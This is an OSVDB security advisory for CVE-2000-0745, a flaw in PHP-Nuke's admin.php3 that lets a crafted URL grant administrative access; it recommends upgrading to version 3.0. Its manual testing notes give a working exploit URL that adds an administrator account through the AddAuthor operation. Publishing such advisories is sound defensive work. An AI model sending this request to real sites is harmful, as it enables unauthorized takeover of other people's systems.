PHP-Nuke admin.php3 Gain Administrative Privilege

2000-08-20T00:00:00
ID OSVDB:1521
Type osvdb
Reporter OSVDB
Modified 2000-08-20T00:00:00

Description

Vulnerability Description

PHP-Nuke contains a flaw that may allow a malicious user to gain administrative privileges. The issue is triggered when a specially crafted URL is sent to the server, which exploits a flaw in admin.php3. It is possible that the flaw may allow an attacker to take control of the system resulting in a loss of confidentiality, integrity, and/or availability.

Solution Description

Upgrade to version 3.0 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

PHP-Nuke contains a flaw that may allow a malicious user to gain administrative privileges. The issue is triggered when a specially crafted URL is sent to the server, which exploits a flaw in admin.php3. It is possible that the flaw may allow an attacker to take control of the system resulting in a loss of confidentiality, integrity, and/or availability.

Manual Testing Notes

The following URL will add the account "godbless:indonesia" into the authors database:

http://www.example.com/admin.php3? admin=YmxhYmxhOg%3D%3D&op= AddAuthor&add_aid=godbless&add_name= Godbless&add_pwd=indonesia&add_url=&add_email=fake@mail.me

References:

Vendor URL: http://www.phpnuke.org Other Advisory URL: http://www.securityfocus.com/archive/1/78500 Other Advisory URL: http://www.securityfocus.com/archive/1/77378 Other Advisory URL: http://www.securiteam.com/securitynews/5AP0L002AG.html ISS X-Force ID: 5108 CVE-2000-0745 Bugtraq ID: 1592